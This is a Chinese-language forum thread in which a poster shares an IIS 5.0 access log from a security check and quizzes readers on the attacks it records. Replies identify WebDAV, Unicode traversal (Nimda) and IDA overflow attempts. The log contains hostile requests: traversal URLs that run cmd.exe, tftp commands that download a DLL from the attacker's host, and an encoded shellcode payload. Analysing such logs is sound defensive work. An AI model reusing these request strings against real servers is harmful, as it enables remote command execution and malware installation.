[分享]大家来看看。好东西！

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-04-27 04:19:37
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-04-27 04:19:37 203.40.27.231 - 61.54.86.69 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-04-27 04:40:46 61.54.36.8 - 61.54.86.69 80 GET /scripts/root.exe /c+dir 404 -
2003-04-27 04:40:46 61.54.36.8 - 61.54.86.69 80 GET /MSADC/root.exe /c+dir 403 -
2003-04-27 04:40:47 61.54.36.8 - 61.54.86.69 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:40:47 61.54.36.8 - 61.54.86.69 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:40:47 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 04:45:18 61.54.36.8 - 61.54.86.69 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:45:18 61.54.36.8 - 61.54.86.69 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 04:45:18 61.54.36.8 - 61.54.86.69 80 GET /msadc/..%5c../..%5c../..%5c/..\../..\../..\../winnt/system32/cmd.exe /c+dir 403 -
2003-04-27 04:45:22 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 04:45:25 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 04:49:25 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 04:49:53 61.54.36.8 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 04:51:36 61.54.36.8 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 04:53:14 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 04:54:17 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 04:55:00 61.54.36.8 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 04:55:46 61.54.36.8 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.36.8%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:25:14 61.54.12.253 - 61.54.86.69 80 GET /scripts/root.exe /c+dir 404 -
2003-04-27 05:25:17 61.54.12.253 - 61.54.86.69 80 GET /MSADC/root.exe /c+dir 403 -
2003-04-27 05:25:24 61.54.12.253 - 61.54.86.69 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:25:24 61.54.12.253 - 61.54.86.69 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:25:24 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../httpodbc.dll - 500 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /msadc/..%5c../..%5c../..%5c/..\../..\../..\../winnt/system32/cmd.exe /c+dir 403 -
2003-04-27 05:28:27 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:30:51 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:31:28 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:32:45 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:32:59 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:33:44 61.54.12.253 - 61.54.86.69 80 GET /scripts/..\../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 05:35:59 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:37:43 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:38:22 61.54.12.253 - 61.54.86.69 80 GET /scripts/../../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 05:40:29 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2003-04-27 05:43:55 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20c:\httpodbc.dll 502 -
2003-04-27 05:47:12 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20d:\httpodbc.dll 502 -
2003-04-27 05:47:12 61.54.12.253 - 61.54.86.69 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.54.12.253%20GET%20cool.dll%20e:\httpodbc.dll 502 -
2003-04-27 05:59:09 61.54.92.146 - 61.54.86.69 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 400 -

     这是我在帮人检测安全时看到的。

     考考大家：
     1、对方用了那几种攻击手段？
     2、那几个成功，那几个失败？
     3、系统有那些漏洞？
     4、怎么修补漏洞？ :em02:

有个cgi 应该是袁哥发现的那样~

我知道后面带有200的,就是入侵者成功的执行了unicode漏洞了,
403的话应该是权限不够之类的,404就是找不到该页面
该入侵者还有tftp上传了个dll文件,不知道做什么用的,前面两个入侵者应该是同一个人吧,改的名都一样!
最后那个是400,我不太清楚代表什么,应该也是没成功吧!

     总共有三种方式：1、WebDAV溢出

                     2、unicode
                     3、IDQ.IDA溢出
     而那个unicode其实是NIMDA蠕虫病毒通过IIS的感染过程。

这台主机好像还是xp吧,iis是5.1的

是吗？
XP会存在unicode漏洞漏洞吗？
IIS是5.1的吧

unicode漏洞会不会存在于XP我就不知道了,我只知道是iis5.1一般情况操作系统是xp

当家的全是饭桶：（ 难怪没发展

看不懂！！！：（

你妈的能不能有新的玩法的